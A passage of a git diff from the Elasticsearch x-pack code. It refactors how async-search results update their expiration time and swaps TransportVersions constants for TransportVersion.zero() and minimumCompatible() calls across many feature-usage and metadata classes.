RestStatus.NOT_FOUND) { - logger.error( - () -> format("failed to update expiration time for async-search [%s]", searchId.getEncoded()), - exc - ); - listener.onFailure(exc); - } else { - // the async search document or its index is not found. - // That can happen if an invalid/deleted search id is provided. - listener.onFailure(new ResourceNotFoundException(searchId.getEncoded())); - } - }) + listener.delegateFailure((l, unused) -> getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, l)) ); } else { getSearchResponseFromTask(searchId, request, nowInMillis, expirationTime, listener); @@ -122,7 +110,7 @@ private void getSearchResponseFromTask( try { final Task task = store.getTaskAndCheckAuthentication(taskManager, searchId, asyncTaskClass); if (task == null || (updateInitialResultsInStore && task.isCancelled())) { - getSearchResponseFromIndex(searchId, request, nowInMillis, listener); + getSearchResponseFromIndexAndUpdateExpiration(searchId, request, nowInMillis, expirationTimeMillis, listener); return; } @@ -137,30 +125,40 @@ private void getSearchResponseFromTask( if (added == false) { // the task must have completed, since we cannot add a completion listener assert store.getTaskAndCheckAuthentication(taskManager, searchId, asyncTaskClass) == null; - getSearchResponseFromIndex(searchId, request, nowInMillis, listener); + getSearchResponseFromIndexAndUpdateExpiration(searchId, request, nowInMillis, expirationTimeMillis, listener); } } catch (Exception exc) { listener.onFailure(exc); } } - private void getSearchResponseFromIndex( + private void getSearchResponseFromIndexAndUpdateExpiration( AsyncExecutionId searchId, GetAsyncResultRequest request, long nowInMillis, - ActionListener listener + long expirationTime, + ActionListener outListener ) { - store.getResponse(searchId, true, listener.delegateFailure((l, response) -> { - try { - sendFinalResponse(request, response, nowInMillis, l); - } finally { - if (response instanceof StoredAsyncResponse storedAsyncResponse - && storedAsyncResponse.getResponse() instanceof RefCounted refCounted) { - refCounted.decRef(); + var updateListener = outListener.delegateFailure((listener, unused) -> { + store.getResponse(searchId, true, listener.delegateFailure((l, response) -> { + try { + sendFinalResponse(request, response, nowInMillis, l); + } finally { + if (response instanceof StoredAsyncResponse storedAsyncResponse + && storedAsyncResponse.getResponse() instanceof RefCounted refCounted) { + refCounted.decRef(); + } } - } - })); + })); + }); + // If updateInitialResultsInStore=false, we can't update expiration while the task is running since the document doesn't exist yet. + // So let's update the expiration here when the task has been completed. + if (updateInitialResultsInStore == false && expirationTime != -1) { + updateExpirationTime(searchId, expirationTime, updateListener.map(unused -> null)); + } else { + updateListener.onResponse(null); + } } private void sendFinalResponse(GetAsyncResultRequest request, Response response, long nowInMillis, ActionListener listener) { @@ -172,4 +170,18 @@ private void sendFinalResponse(GetAsyncResultRequest request, Response response, listener.onResponse(response); } + + private void updateExpirationTime(AsyncExecutionId searchId, long expirationTime, ActionListener listener) { + store.updateExpirationTime(searchId.getDocId(), expirationTime, listener.delegateResponse((l, e) -> { + RestStatus status = ExceptionsHelper.status(ExceptionsHelper.unwrapCause(e)); + if (status != RestStatus.NOT_FOUND) { + logger.error(() -> format("failed to update expiration time for async-search [%s]", searchId.getEncoded()), e); + l.onFailure(e); + } else { + // the async search document or its index is not found. + // That can happen if an invalid/deleted search id is provided. + l.onFailure(new ResourceNotFoundException(searchId.getEncoded())); + } + })); + } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java index 802d43436d379..8876328397868 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/AutoFollowMetadata.java @@ -8,7 +8,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.metadata.DataStream; import org.elasticsearch.cluster.metadata.IndexAbstraction; @@ -138,7 +137,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java index 4b2b840d6dfdc..af020ae6c3b90 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ccr/action/ShardFollowTask.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.ccr.action; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -198,6 +197,6 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java index a57821670647b..33defc62c91a8 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datastreams/DataStreamFeatureSetUsage.java @@ -43,7 +43,7 @@ public void writeTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public DataStreamStats getStats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java index 48002e6ed41fc..3d206059c1005 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/datatiers/DataTiersFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.datatiers; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.Strings; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -45,7 +44,7 @@ public DataTiersFeatureSetUsage(Map tierStats) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public Map getTierStats() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java index b51fa386ddeea..220b6dcae9c5a 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.enrich; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -27,6 +26,6 @@ public EnrichFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java index 117dea14229e2..ccd09888870e9 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/enrich/EnrichMetadata.java @@ -8,7 +8,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.AbstractNamedDiffable; import org.elasticsearch.cluster.metadata.Metadata; import org.elasticsearch.common.io.stream.StreamInput; @@ -86,7 +85,7 @@ public EnumSet context() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java index 96742c1e5e57f..689da75d9b1ec 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/eql/EqlFeatureSetUsage.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.eql; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.XContentBuilder; @@ -54,7 +53,7 @@ public void writeTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java index 9421454abfff9..192514945c99d 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/frozen/FrozenIndicesFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.frozen; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.UpdateForV10; @@ -30,7 +29,7 @@ public FrozenIndicesFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java index 53994f310c949..88f5fed3ea4fa 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/graph/GraphFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.graph; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -26,7 +25,7 @@ public GraphFeatureSetUsage(boolean available, boolean enabled) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java index 543a5be812a1c..03b9f899aeac8 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleFeatureSetUsage.java @@ -40,7 +40,7 @@ public IndexLifecycleFeatureSetUsage(StreamInput input) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java index 5d5739e5867fd..c1faa535af397 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ilm/IndexLifecycleMetadata.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ilm; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; import org.elasticsearch.cluster.NamedDiff; @@ -124,7 +123,7 @@ public Iterator toXContentChunked(ToXContent.Params ignore @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -200,7 +199,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } static Diff readLifecyclePolicyDiffFrom(StreamInput in) throws IOException { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java index 4a5ebad732d78..a2f6c6cdce4b0 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/logstash/LogstashFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.logstash; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.xpack.core.XPackFeatureUsage; import org.elasticsearch.xpack.core.XPackField; @@ -26,7 +25,7 @@ public LogstashFeatureSetUsage(boolean available) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java index 82f50ba3a889f..844a61d0221b7 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MachineLearningFeatureSetUsage.java @@ -75,7 +75,7 @@ public MachineLearningFeatureSetUsage(StreamInput in) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java index 723b821abd17f..eccfb93ddbea4 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/MlMetadata.java @@ -67,7 +67,7 @@ public boolean isResetMode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override @@ -181,7 +181,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } static Diff readJobDiffFrom(StreamInput in) throws IOException { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java index cf17a828930c5..dc2305022cbf2 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/OpenJobAction.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.action; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionRequestValidationException; import org.elasticsearch.action.ActionType; import org.elasticsearch.action.support.master.MasterNodeRequest; @@ -229,7 +228,7 @@ public String toString() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java index c21a4bfe03156..cf23bc27010e8 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDataFrameAnalyticsAction.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.action; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionRequestValidationException; import org.elasticsearch.action.ActionType; import org.elasticsearch.action.support.master.MasterNodeRequest; @@ -206,7 +205,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java index deeed6df87064..339680348a28e 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/action/StartDatafeedAction.java @@ -8,7 +8,6 @@ import org.elasticsearch.ElasticsearchParseException; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.action.ActionRequestValidationException; import org.elasticsearch.action.ActionType; import org.elasticsearch.action.ValidateActions; @@ -279,7 +278,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.MINIMUM_COMPATIBLE; + return TransportVersion.minimumCompatible(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java index b8ac1b2f2cfdd..f3bada2a9f0e7 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/ModelAliasMetadata.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.ml.inference; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.cluster.ClusterState; import org.elasticsearch.cluster.Diff; import org.elasticsearch.cluster.DiffableUtils; @@ -113,7 +112,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override @@ -163,7 +162,7 @@ public void writeTo(StreamOutput out) throws IOException { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java index b04b49e645bcb..8fb9f62652a63 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfig.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ObjectParser; @@ -226,7 +225,7 @@ public MlConfigVersion getMinimalSupportedMlConfigVersion() { @Override public TransportVersion getMinimalSupportedTransportVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static Builder builder() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java index 9ee97029541f1..6f7888e220a3f 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ClassificationConfigUpdate.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ObjectParser; @@ -210,7 +209,7 @@ public boolean isSupported(InferenceConfig inferenceConfig) { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class Builder implements InferenceConfigUpdate.Builder { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java index c6d70543d89ed..25a8ee939c49e 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/EmptyConfigUpdate.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xpack.core.ml.MlConfigVersion; @@ -71,7 +70,7 @@ public int hashCode() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static class Builder implements InferenceConfigUpdate.Builder { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java index 13c63b9cc7ba0..cfff8bb216002 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfig.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ObjectParser; @@ -159,7 +158,7 @@ public MlConfigVersion getMinimalSupportedMlConfigVersion() { @Override public TransportVersion getMinimalSupportedTransportVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } public static Builder builder() { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java index c7b66ef95943e..929c475345b0c 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/RegressionConfigUpdate.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.xcontent.ObjectParser; @@ -114,7 +113,7 @@ public String getName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java index fdd8735bb2454..d66667c775bbf 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ResultsFieldUpdate.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.ml.inference.trainedmodel; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; @@ -55,7 +54,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java index 749bf786ad44b..f1988b4dbd275 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/TrainedModel.java @@ -8,7 +8,6 @@ import org.apache.lucene.util.Accountable; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.NamedWriteable; import org.elasticsearch.xpack.core.ml.utils.NamedXContentObject; @@ -34,6 +33,6 @@ public interface TrainedModel extends NamedXContentObject, NamedWriteable, Accou long estimatedNumOperations(); default TransportVersion getMinimalCompatibilityVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } } diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java index 94d0431ff470d..3df10585aee10 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/inference/trainedmodel/ensemble/Ensemble.java @@ -10,7 +10,6 @@ import org.apache.lucene.util.Accountables; import org.apache.lucene.util.RamUsageEstimator; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -286,7 +285,7 @@ public TransportVersion getMinimalCompatibilityVersion() { return models.stream() .map(TrainedModel::getMinimalCompatibilityVersion) .max(TransportVersion::compareTo) - .orElse(TransportVersions.ZERO); + .orElse(TransportVersion.zero()); } public static class Builder { diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/job/snapshot/upgrade/SnapshotUpgradeTaskParams.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/job/snapshot/upgrade/SnapshotUpgradeTaskParams.java index 7a0a524f55920..7ada64cb7418e 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/job/snapshot/upgrade/SnapshotUpgradeTaskParams.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/ml/job/snapshot/upgrade/SnapshotUpgradeTaskParams.java @@ -8,7 +8,6 @@ package org.elasticsearch.xpack.core.ml.job.snapshot.upgrade; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.persistent.PersistentTaskParams; @@ -69,7 +68,7 @@ public String getWriteableName() { @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + return TransportVersion.zero(); } @Override diff --git a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java index 48c14f79abcbf..6ee2d270b3206 100644 --- a/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java +++ b/x-pack/plugin/core/src/main/java/org/elasticsearch/xpack/core/monitoring/MonitoringFeatureSetUsage.java @@ -7,7 +7,6 @@ package org.elasticsearch.xpack.core.monitoring; import org.elasticsearch.TransportVersion; -import org.elasticsearch.TransportVersions; import org.elasticsearch.common.io.stream.StreamInput; import org.elasticsearch.common.io.stream.StreamOutput; import org.elasticsearch.core.Nullable; @@ -40,7 +39,7 @@ public MonitoringFeatureSetUsage(boolean collectionEnabled, Map @Override public TransportVersion getMinimalSupportedVersion() { - return TransportVersions.ZERO; + 